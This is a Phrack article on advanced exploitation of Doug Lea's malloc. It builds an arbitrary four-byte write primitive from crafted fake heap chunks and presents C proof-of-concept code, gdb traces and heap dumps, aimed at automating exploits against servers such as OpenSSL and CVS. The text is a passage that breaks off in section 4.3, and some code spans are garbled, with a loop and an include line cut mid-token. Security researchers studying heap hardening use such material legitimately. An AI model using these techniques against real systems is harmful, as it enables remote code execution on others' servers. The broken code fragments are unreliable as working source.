                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3d, Phile #0x06 of 0x0f

|=--------------[ Advanced Doug lea's malloc exploits ]-----------------=|
|=----------------------------------------------------------------------=|
|=-----------------------[ jp ]-------------------------=|
|=----------------------------------------------------------------------=|

  1 - Abstract

  2 - Introduction

  3 - Automating exploitation problems

  4 - The techniques
    4.1 - aa4bmo primitive
      4.1.1 - First unlinkMe chunk
        4.1.1.1 - Proof of concept 1: unlinkMe chunk
      4.1.2 - New unlinkMe chunk
    4.2 - Heap layout analysis
      4.2.1 - Proof of concept 2: Heap layout debugging
    4.3 - Layout reset - initial layout prediction - server model
    4.4 - Obtaining information from the remote process
      4.4.1 - Modifying server static data - finding process' DATA
      4.4.2 - Modifying user input - finding shellcode location
        4.4.2.1 - Proof of concept 3: Hitting the output
      4.4.3 - Modifying user input - finding libc's data
        4.4.3.1 - Proof of concept 4: Freeing the output
      4.4.4 - Vulnerability based heap memory leak - finding libc's DATA
    4.5 - Abusing the leaked information
      4.5.1 - Recognizing the arena
      4.5.2 - Morecore
        4.5.2.1 - Proof of concept 5: Jumping with morecore
      4.5.3 - Libc's GOT bruteforcing
        4.5.3.1 - Proof of concept 6: Hinted libc's GOT bruteforcing
      4.5.4 - Libc fingerprinting
      4.5.5 - Arena corruption (top, last remainder and bin modification)
    4.6 - Copying the shellcode 'by hand'

  5 - Conclusions

  6 - Thanks

  7 - References

  Appendix I - malloc internal structures overview

---------------------------------------------------------------------------

--[ 1. Abstract

This paper details several techniques that allow more generic and reliable
exploitation of processes that provide us with the ability to overwrite an
almost arbitrary 4 byte value at any location.

Higher level techniques will be constructed on top of the basic unlink()
technique (presented in MaXX's article [2]) to exploit processes which
allow an attacker to corrupt Doug Lea's malloc (Linux's default dynamic
memory allocator).  unlink() is used to force specific information leaks
of the target process memory layout.  The obtained information is used to
exploit the target without any prior knowledge or hardcoded values, even
when randomization of the main object's and/or libraries' load address is
present.

Several tricks will be presented along different scenarios, including:

  * special chunks crafting (cushion chunk and unlinkMe chunk)
  * heap layout consciousness and analysis using debugging tools
  * automatically finding the injected shellcode in the process memory
  * forcing a remote process to provide malloc's internal structures
    addresses
  * looking for a function pointer within glibc
  * injecting the shellcode into a known memory address

The combination of these techniques allows us to exploit the OpenSSL
'SSLv2 Malformed Client Key Buffer Overflow' [6] and the CVS 'Directory
double free' [7] vulnerabilities in a fully automated way (without
hardcoding any target based address or offset), for example.

---------------------------------------------------------------------------

--[ 2. Introduction

Given a vulnerability which allows us to corrupt malloc's internal
structures (i.e. heap overflow, double free(), etc), we can say it
'provides' us with the ability to perform at least an 'almost arbitrary
4 bytes mirrored overwrite' primitive (aa4bmo from now on).
We say it's a 'mirrored' overwrite as the location we are writing at minus
8 will be stored in the address given by the value we are writing plus 12.
Note we say 'almost' arbitrary because, as a side effect of the mirrored
copy, we can only write values that are themselves pointers to writable
memory.

The 'primitive' concept was previously introduced in the 'Advances in
format string exploitation' paper [4] and in the 'About exploits writing'
presentation [5].  The previous works 'Vudo - An object superstitiously
believed to embody magical power' by Michel 'MaXX' Kaempf [2] and 'Once
upon a free()' [3] give fully detailed explanations on how to obtain the
aa4bmo primitive from a vulnerability.  The first examples of malloc based
exploitation can be found at [8] and [9].  We'll be using the unlink()
technique from [2] as the basic lower level mechanism to obtain the aa4bmo
primitive, which we'll use throughout the paper to build higher level
techniques.

                   malloc                               higher
  vulnerability -> structures     ->   primitive  ->    level
                   corruption                           techniques
 -------------------------------------------------------------------------
  heap overflow    unlink()                             freeing the output
  double free() -> technique      ->   aa4bmo     ->    hitting the output
  ...              cushion chunk                        ...

This paper focuses mainly on the question that arises after we reach the
aa4bmo primitive: what should we do once we know a process allows us to
overwrite four bytes of its memory with almost any arbitrary data?  In
addition, tips to reach the aa4bmo primitive in a reliable way are
explained.

Although the techniques are presented in the context of malloc based heap
overflow exploitation, they can be employed to aid in format string
exploits as well, or with any other vulnerability (or combination of them)
which provides us with similar capabilities.

The research was focused on the Linux/Intel platform; glibc-2.2.4,
glibc-2.2.5 and glibc-2.3 sources were used, mainly the file malloc.c (an
updated version of malloc can be found at [1]).  Throughout this paper
we'll use 'malloc' to refer to Doug Lea's malloc based implementation.

---------------------------------------------------------------------------

--] 3. Automating exploitation problems

When trying to answer the question 'what should we do once we know we can
overwrite four bytes of the process memory with almost any arbitrary
data?', we face several problems:

A] how can we be sure we are overwriting the desired bytes with the
   desired values?

As the aa4bmo primitive is the underlying layer that allows us to
implement the higher level techniques, we need to be completely sure it is
working as expected, even though we won't know in advance where our data
will be located.  Also, in order to be useful, the primitive should not
crash the exploited process.

B] what should we write?

We may write the address of the code we intend to execute, or we may
modify a process variable.  In case we inject our shellcode in the
process, we need to know its location, which may vary together with the
evolving process heap/stack layout.

C] where should we write?

Several known locations can be overwritten to modify the execution flow,
including for example the ones shown in [10], [11], [12] and [14].  In
case we are overwriting a function pointer (as when overwriting a stack
frame, GOT entry, process specific function pointer, setjmp/longjmp, file
descriptor function pointer, etc), we need to know its precise location.
The same happens if we plan to overwrite a process variable.
For example, a GOT entry address may differ even when the source code is
the same, as compilation and linking parameters may yield a different
process layout; this happens, for instance, when the same program is
compiled for different Linux distributions.

Throughout this paper, our examples will be oriented at overwriting a
function pointer with the address of the injected shellcode.  However,
some techniques also apply to other cases.

Typical exploits are target based, hardcoding at least one of the values
required for exploitation, such as the address of a given GOT entry,
depending on the targeted daemon version and the Linux distribution and
release version.  Although this simplifies the exploitation process, it is
not always feasible to obtain the required information (i.e. a server can
be configured to lie or to not disclose its version number).  Besides, we
may not have the needed information for that target.  Bruteforcing more
than one exploit parameter may not always be possible, if each of the
values can't be obtained separately.

There are some well known techniques used to improve the reliability
(probability of success) of a given exploit, but they are only an aid for
improving the exploitation chances.  For example, we may pad the shellcode
with more nops, or we may inject a larger quantity of shellcode into the
process (depending on the process being exploited), assuming there are
more chances of hitting it that way.  Although these enhancements will
improve the reliability of our exploit, they are not enough for an exploit
to always work on any vulnerable target.

In order to create a fully reliable exploit, we'll need to obtain both the
address where our shellcode gets injected and the address of a function
pointer to overwrite.  In the following, we discuss how these requirements
may be met in an automated way, without any prior knowledge of the target
server.  Most of the article details how we can force a remote process to
leak the required information using the aa4bmo primitive.

---------------------------------------------------------------------------

--] 4. The techniques

--] 4.1 aa4bmo primitive

--] 4.1.1 First unlinkMe chunk

In order to be sure that our primitive is working as expected, even in
scenarios where we are not able to fully predict the location of our
injected fake chunk, we build the following 'unlinkMe chunk':

     -4       -4      what   where-8    -11      -15      -19    ...
 |--------|--------|--------|--------|--------|--------|--------|...
    sizeB    sizeA     FD       BK
 |----------- nasty chunk ----------|--------|--------------------> (X)

We just need a free() call to hit our block after the (X) point to
overwrite 'where' with 'what'.  When free() is called the following
sequence takes place:

  - chunk_free() tries to look for the next chunk: it takes the chunk's
    size (<0) and adds it to the chunk address, always obtaining the sizeA
    of the 'nasty chunk' as the start of the next chunk, as all the sizes
    after the (X) point are relative to it.

  - Then, it checks the prev_inuse bit of our chunk; as we set it (each of
    the sizes after the (X) point has the prev_inuse bit set, and the
    IS_MMAPPED bit not set), it does not try to consolidate backward
    (because the previous chunk 'seems' to be allocated).

  - Finally, it checks whether the fake next chunk (our nasty chunk) is
    free.  It takes its size (-4) to look for the chunk after it,
    obtaining our fake sizeB, and checks its prev_inuse flag, which is not
    set.  So, it tries to unlink our nasty chunk from its bin to coalesce
    it with the chunk being freed.
  - When unlink() is called, we get the aa4bmo primitive.  The unlink()
    technique is described in [2] and [3].

--] 4.1.1.1 Proof of concept 1: unlinkMe chunk

We'll use the following code to show in a simple way the unlinkMe chunk in
action:

#define WHAT_2_WRITE 0xbfffff00
#define WHERE_2_WRITE 0xbfffff00
#define SZ 256
#define SOMEOFFSET 5 + (rand() % (SZ-1))
#define PREV_INUSE 1
#define IS_MMAP 2

int main(void){
	unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
	int i = 0;

	unlinkMe[i++] = -4;
	unlinkMe[i++] = -4;
	unlinkMe[i++] = WHAT_2_WRITE;
	unlinkMe[i++] = WHERE_2_WRITE-8;
	for(;i<SZ;i++){
		/* fill the rest with negative sizes relative to the nasty
		   chunk (-11, -15, -19, ...), prev_inuse bit set */
		unlinkMe[i] = (-4*(i-1)) | PREV_INUSE;
	}
	free(unlinkMe+SOMEOFFSET);
	return 0;
}

Stepping into the free() call with gdb:

        (void)mutex_lock(&ar_ptr->mutex);
 3205   chunk_free(ar_ptr, p);

After some checks, we reach chunk_free().

(gdb) s
chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221

Let's see how our chunk looks at a random location...

(gdb) x/20x p
0x8049874:  0xfffffd71  0xfffffd6d  0xfffffd69  0xfffffd65
0x8049884:  0xfffffd61  0xfffffd5d  0xfffffd59  0xfffffd55
0x8049894:  0xfffffd51  0xfffffd4d  0xfffffd49  0xfffffd45
0x80498a4:  0xfffffd41  0xfffffd3d  0xfffffd39  0xfffffd35
0x80498b4:  0xfffffd31  0xfffffd2d  0xfffffd29  0xfffffd25

We dumped the chunk including its header, as received by chunk_free().

 3221   INTERNAL_SIZE_T hd = p->size;   /* its head field */
 3235   sz = hd & ~PREV_INUSE;

(gdb) p/x hd
$5 = 0xfffffd6d
(gdb) p/x sz
$6 = 0xfffffd6c

 3236   next = chunk_at_offset(p, sz);
 3237   nextsz = chunksize(next);

Using the negative relative size, chunk_free() gets the next chunk; let's
see which is the 'next' chunk:

(gdb) x/20x next
0x80495e0:  0xfffffffc  0xfffffffc  0xbfffff00  0xbffffef8
0x80495f0:  0xfffffff5  0xfffffff1  0xffffffed  0xffffffe9
0x8049600:  0xffffffe5  0xffffffe1  0xffffffdd  0xffffffd9
0x8049610:  0xffffffd5  0xffffffd1  0xffffffcd  0xffffffc9
0x8049620:  0xffffffc5  0xffffffc1  0xffffffbd  0xffffffb9

(gdb) p/x nextsz
$7 = 0xfffffffc

It's our nasty chunk...

 3239   if (next == top(ar_ptr))                      /* merge with top */
 3278   islr = 0;
 3280   if (!(hd & PREV_INUSE))                  /* consolidate backward */

We avoid the backward consolidation, as we set the PREV_INUSE bit.

 3294   if (!(inuse_bit_at_offset(next, nextsz))) /* consolidate forward */

But we force a forward consolidation.  The inuse_bit_at_offset() macro
adds nextsz (-4) to our nasty chunk's address, and looks for the
PREV_INUSE bit in our other -4 size.

 3296   sz += nextsz;
 3298   if (!islr && next->fd == last_remainder(ar_ptr))
 3306   unlink(next, bck, fwd);

unlink() is called with our supplied values, 0xbfffff00 and 0xbffffef8, as
forward and backward pointers (it does not crash, as they are valid
addresses).

        next = chunk_at_offset(p, sz);
 3315   set_head(p, sz | PREV_INUSE);
 3316   next->prev_size = sz;
 3317   if (!islr) {
 3318     frontlink(ar_ptr, p, sz, idx, bck, fwd);

frontlink() is called and our chunk is inserted into the proper bin.

--- BIN DUMP ---
arena @ 0x40018040 - top @ 0x8049a40 - top size = 0x05c0
  bin 126 @ 0x40018430
    free_chunk @ 0x80498d8 - size 0xfffffd64

The chunk was inserted into one of the bigger bins... as a consequence of
its 'negative' size.  The process won't crash if we are able to maintain
this state.  If more calls to free() hit our chunk, it won't crash.
But it will crash in case a malloc() call does not find any free chunk to satisfy the allocation requirement and tries to split one of the bins in the bin number 126, as it will try to calculate where is the chunk after the fake one, getting out of the valid address range because of the big 'negative' size (this may not happen in a scenario where there is enough memory allocated between the fake chunk and the top chunk, forcing this layout is not very difficult when the target server does not impose tight limits to our requests size). We can check the results of the aa4bmo primitive: (gdb) x/20x 0xbfffff00 !!!!!!!!!! !!!!!!!!!! 0xbfffff00: 0xbfffff00 0x414c0065 0x653d474e 0xbffffef8 0xbfffff10: 0x6f73692e 0x39353838 0x53003531 0x415f4853 0xbfffff20: 0x41504b53 0x2f3d5353 0x2f727375 0x6562696c 0xbfffff30: 0x2f636578 0x6e65706f 0x2f687373 0x6d6f6e67 0xbfffff40: 0x73732d65 0x73612d68 0x7361706b 0x4f480073 If we add some bogus calls to free() in the following way: for(i=0;i<5;i++) free(unlinkMe+SOMEOFFSET); we obtain the following result for example: --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 126 @ 0x40018430 free_chunk @ 0x8049958 - size 0x8049958 free_chunk @ 0x8049954 - size 0xfffffd68 free_chunk @ 0x8049928 - size 0xfffffd94 free_chunk @ 0x8049820 - size 0x40018430 free_chunk @ 0x80499c4 - size 0xfffffcf8 free_chunk @ 0x8049818 - size 0xfffffea4 without crashing the process. --] 4.1.2 New unlinkMe chunk Changes introduced in newer libc versions (glibc-2.3 for example) affect our unlinkMe chunk. The main problem for us is related to the addition of one flag bit more. SIZE_BITS definition was modified, from: #define SIZE_BITS (PREV_INUSE|IS_MMAPPED) to: #define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA) The new flag, NON_MAIN_ARENA is defined like this: /* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained from a non-main arena. This is only set immediately before handing the chunk to the user, if necessary. */ #define NON_MAIN_ARENA 0x4 This makes our previous unlinkMe chunk to fail in two different points in systems using a newer libc. Our first problem is located within the following code: public_fREe(Void_t* mem) { ... ar_ptr = arena_for_chunk(p); ... _int_free(ar_ptr, mem); ... where: #define arena_for_chunk(ptr) \ (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena) and /* check for chunk from non-main arena */ #define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA) If heap_for_ptr() is called when processing our fake chunk, the process crashes in the following way: 0x42074a04 in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a04 : and $0x4,%edx (gdb) x/20x $edx 0xffffffdd: Cannot access memory at address 0xffffffdd 0x42074a07 in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a07 : je 0x42074a52 0x42074a09 in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a09 : and $0xfff00000,%eax 0x42074a0e in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a0e : mov (%eax),%edi (gdb) x/x $eax 0x8000000: Cannot access memory at address 0x8000000 Program received signal SIGSEGV, Segmentation fault. 0x42074a0e in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a0e : mov (%eax),%edi So, the fake chunk size has to have its NON_MAIN_ARENA flag not set. Then, our second problem takes places when the supplied size is masked with the SIZE_BITS. 
Older code looked like this: nextsz = chunksize(next); 0x400152e2 : mov 0x4(%edx),%ecx 0x400152e5 : and $0xfffffffc,%ecx and new code is: nextsize = chunksize(nextchunk); 0x42073fe0 <_int_free+112>: mov 0x4(%ecx),%eax 0x42073fe3 <_int_free+115>: mov %ecx,0xffffffec(%ebp) 0x42073fe6 <_int_free+118>: mov %eax,0xffffffe4(%ebp) 0x42073fe9 <_int_free+121>: and $0xfffffff8,%eax So, we can't use -4 anymore, the smaller size we can provide is -8. Also, we are not able anymore to make every chunk to point to our nasty chunk. The following code shows our new unlinkMe chunk which solves both problems: unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where,unsigned long sz){ unsigned long *unlinkMe; int i=0; if(sz<13) sz = 13; unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long)); // 1st nasty chunk unlinkMe[i++] = -4; // PREV_INUSE is not set unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; // 2nd nasty chunk unlinkMe[i++] = -4; // PREV_INUSE is not set unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;isize); if(p == top(ar_ptr)) { fprintf(stderr, " (T)\n"); break; } else if(p->size == (0|PREV_INUSE)) { fprintf(stderr, " (Z)\n"); break; } if(inuse(p)) fprintf(stderr," (A)"); else fprintf(stderr," (F) | 0x%8x | 0x%8x |",p->fd,p->bk); if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) fprintf(stderr," (LR)"); else if(p->fd==p->bk & ~inuse(p)) fprintf(stderr," (LC)"); fprintf(stderr,"\n"); p = next_chunk(p); } fprintf(stderr,"sbrk_end %p\n",sbrk_base+sbrked_mem); } static void #if __STD_C heap_layout(arena *ar_ptr) #else heap_layout(ar_ptr) arena *ar_ptr; #endif { mchunkptr p; fprintf(stderr,"\n--- HEAP LAYOUT ---\n"); p = (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK); for(;;p=next_chunk(p)) { if(p==top(ar_ptr)) { fprintf(stderr,"|T|\n\n"); break; } if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) { fprintf(stderr,"|L|"); continue; } if(inuse(p)) { fprintf(stderr,"|A|"); continue; } fprintf(stderr,"|%lu|",bin_index(p->size)); continue; } } } static void #if __STD_C bin_dump(arena *ar_ptr) #else bin_dump(ar_ptr) arena *ar_ptr; #endif { int i; mbinptr b; mchunkptr p; fprintf(stderr,"\n--- BIN DUMP ---\n"); (void)mutex_lock(&ar_ptr->mutex); fprintf(stderr,"arena @ %p - top @ %p - top size = 0x%.4x\n", ar_ptr,top(ar_ptr),chunksize(top(ar_ptr))); for (i = 1; i < NAV; ++i) { char f = 0; b = bin_at(ar_ptr, i); for (p = last(b); p != b; p = p->bk) { if(!f){ f = 1; fprintf(stderr," bin %d @ %p\n",i,b); } fprintf(stderr," free_chunk @ %p - size 0x%.4x\n", p,chunksize(p)); } (void)mutex_unlock(&ar_ptr->mutex); fprintf(stderr,"\n"); } --] 4.2.1 Proof of concept 2: Heap layout debugging We'll use the following code to show how the debug functions help to analyse the heap layout: #include int main(void){ void *curly,*larry,*moe,*po,*lala,*dipsi,*tw,*piniata; curly = malloc(256); larry = malloc(256); moe = malloc(256); po = malloc(256); lala = malloc(256); free(larry); free(po); tw = malloc(128); piniata = malloc(128); dipsi = malloc(1500); free(dipsi); free(lala); } The sample debugging section helps to understand malloc's basic algorithms and data structures: (gdb) set env LD_PRELOAD ./heapy.so We override the real malloc with our debugging functions, heapy.so also includes the heap layout dumping functions. 
(gdb) r Starting program: /home/jp/cerebro/heapy/debugging_sample 4 curly = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) extended top chunk: previous size 0x0 new top 0x80496a0 size 0x961 returning 0x8049598 from top chunk (gdb) p heap_dump(0x40018040) --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0961 (T) sbrk_end 0x804a000 (gdb) p bin_dump(0x40018040) --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80496a0 - top size = 0x0960 (gdb) p heap_layout(0x40018040) --- HEAP LAYOUT --- |A||T| The first chunk is allocated, note the difference between the requested size (256 bytes) and the size passed to chunk_alloc(). As there is no chunk, the top needs to be extended and memory is requested to the operating system. More memory than the needed is requested, the remaining space is allocated to the 'top chunk'. In the heap_dump()'s output the (A) represents an allocated chunk, while the (T) means the chunk is the top one. Note the top chunk's size (0x961) has its last bit set, indicating the previous chunk is allocated: /* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */ #define PREV_INUSE 0x1UL The bin_dump()'s output shows no bin, as there is no free chunk yet, except from the top. The heap_layout()'s output just shows an allocated chunk next to the top. 5 larry = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80496a0 from top chunk new top 0x80497a8 size 0x859 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0859 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80497a8 - top size = 0x0858 --- HEAP LAYOUT --- |A||A||T| A new chunk is allocated from the remaining space at the top chunk. The same happens with the next malloc() calls. 
6 moe = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80497a8 from top chunk new top 0x80498b0 size 0x751 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0109 (A) chunk 0x80498b0 0x0751 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80498b0 - top size = 0x0750 --- HEAP LAYOUT --- |A||A||A||T| 7 po = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80498b0 from top chunk new top 0x80499b8 size 0x649 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0109 (A) chunk 0x80498b0 0x0109 (A) chunk 0x80499b8 0x0649 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80499b8 - top size = 0x0648 --- HEAP LAYOUT --- |A||A||A||A||T| 8 lala = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80499b8 from top chunk new top 0x8049ac0 size 0x541 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0109 (A) chunk 0x80498b0 0x0109 (A) chunk 0x80499b8 0x0109 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 --- HEAP LAYOUT --- |A||A||A||A||A||T| 9 free(larry); [1679] FREE(0x80496a8) - CHUNK_FREE(0x40018040,0x80496a0) fronlink(0x80496a0,264,33,0x40018148,0x40018148) new free chunk --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0109 (A) chunk 0x80499b8 0x0109 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 33 @ 0x40018148 free_chunk @ 0x80496a0 - size 0x0108 --- HEAP LAYOUT --- |A||33||A||A||A||T| A chunk is freed. The frontlink() macro is called to insert the new free chunk into the corresponding bin: frontlink(ar_ptr, new_free_chunk, size, bin_index, bck, fwd); Note the arena address parameter (ar_ptr) was omitted in the output. In this case, the chunk at 0x80496a0 was inserted in the bin number 33 according to its size. As this chunk is the only one in its bin (we can check this in the bin_dump()'s output), it's a lonely chunk (LC) (we'll see later that being lonely makes 'him' dangerous...), its bk and fd pointers are equal and point to the bin number 33. In the heap_layout()'s output, the new free chunk is represented by the number of the bin where it is located. 10 free(po); [1679] FREE(0x80498b8) - CHUNK_FREE(0x40018040,0x80498b0) fronlink(0x80498b0,264,33,0x40018148,0x80496a0) new free chunk --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x080498b0 | chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0109 (F) | 0x080496a0 | 0x40018148 | chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 33 @ 0x40018148 free_chunk @ 0x80496a0 - size 0x0108 free_chunk @ 0x80498b0 - size 0x0108 --- HEAP LAYOUT --- |A||33||A||33||A||T| Now, we have two free chunks in the bin number 33. We can appreciate now how the double linked list is built. The forward pointer of the chunk at 0x80498b0 points to the other chunk in the list, the backward pointer points to the list head, the bin. 
Note that there is no longer a lonely chunk. Also, we can see the difference between a heap address and a libc address (the bin address), 0x080496a0 and 0x40018148 respectively. 11 tw = malloc(128); [1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136) unlink(0x80496a0,0x80498b0,0x40018148) from big bin 33 chunk 1 (split) new last_remainder 0x8049728 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x40018048 | 0x40018048 | (LR) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC) chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 1 @ 0x40018048 free_chunk @ 0x8049728 - size 0x0080 bin 33 @ 0x40018148 free_chunk @ 0x80498b0 - size 0x0108 --- HEAP LAYOUT --- |A||A||L||A||33||A||T| In this case, the requested size for the new allocation is smaller than the size of the available free chunks. So, the first freed buffer is taken from the bin with the unlink() macro and splitted. The first part is allocated, the remaining free space is called the 'last remainder', which is always stored in the first bin, as we can see in the bin_dump()'s output. In the heap_layout()'s output, the last remainder chunk is represented with a L; in the heap_dump()'s output, (LR) is used. 12 piniata = malloc(128); [1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136) clearing last_remainder frontlink(0x8049728,128,16,0x400180c0,0x400180c0) last_remainder unlink(0x80498b0,0x40018148,0x40018148) from big bin 33 chunk 1 (split) new last_remainder 0x8049938 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x0081 (F) | 0x40018048 | 0x40018048 | (LR) chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 $25 = void --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 1 @ 0x40018048 free_chunk @ 0x8049938 - size 0x0080 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||L||A||T| As the last_remainder size is not enough for the requested allocation, the last remainder is cleared and inserted as a new free chunk into the corresponding bin. Then, the other free chunk is taken from its bin and split as in the previous step. 13 dipsi = malloc(1500); [1679] MALLOC(1500) - CHUNK_ALLOC(0x40018040,1504) clearing last_remainder frontlink(0x8049938,128,16,0x400180c0,0x8049728) last_remainder extended top chunk: previous size 0x540 new top 0x804a0a0 size 0xf61 returning 0x8049ac0 from top chunk --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 | chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x0081 (F) | 0x08049728 | 0x400180c0 | chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x05e1 (A) chunk 0x804a0a0 0x0f61 (T) sbrk_end 0x804b000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x804a0a0 - top size = 0x0f60 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 free_chunk @ 0x8049938 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||16||A||A||T| As no available free chunk is enough for the requested allocation size, the top chunk was extended again. 
14 free(dipsi); [1679] FREE(0x8049ac8) - CHUNK_FREE(0x40018040,0x8049ac0) merging with top new top 0x8049ac0 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 | chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x0081 (F) | 0x 8049728 | 0x400180c0 | chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x1541 (T) sbrk_end 0x804b000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x1540 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 free_chunk @ 0x8049938 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||16||A||T| The chunk next to the top chunk is freed, so it gets coalesced with it, and it is not inserted in any bin. 15 free(lala); [1679] FREE(0x80499c0) - CHUNK_FREE(0x40018040,0x80499b8) unlink(0x8049938,0x400180c0,0x8049728) for back consolidation merging with top new top 0x8049938 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x16c9 (T) sbrk_end 0x804b000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049938 - top size = 0x16c8 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||T| Again, but this time also the chunk before the freed chunk is coalesced, as it was already free. --------------------------------------------------------------------------- --] 4.3 - Layout reset - initial layout prediction - server model In this section, we analyse how different scenarios may impact on the exploitation process. In case of servers that get restarted, it may be useful to cause a 'heap reset', which means crashing the process on purpose in order to obtain a clean and known initial heap layout. The new heap that gets built together with the new restarted process is in its 'initial layout'. This refers to the initial state of the heap after the process initialization, before receiving any input from the user. The initial layout can be easily predicted and used as a the known starting point for the heap layout evolution prediction, instead of using a not virgin layout result of several modifications performed while serving client requests. This 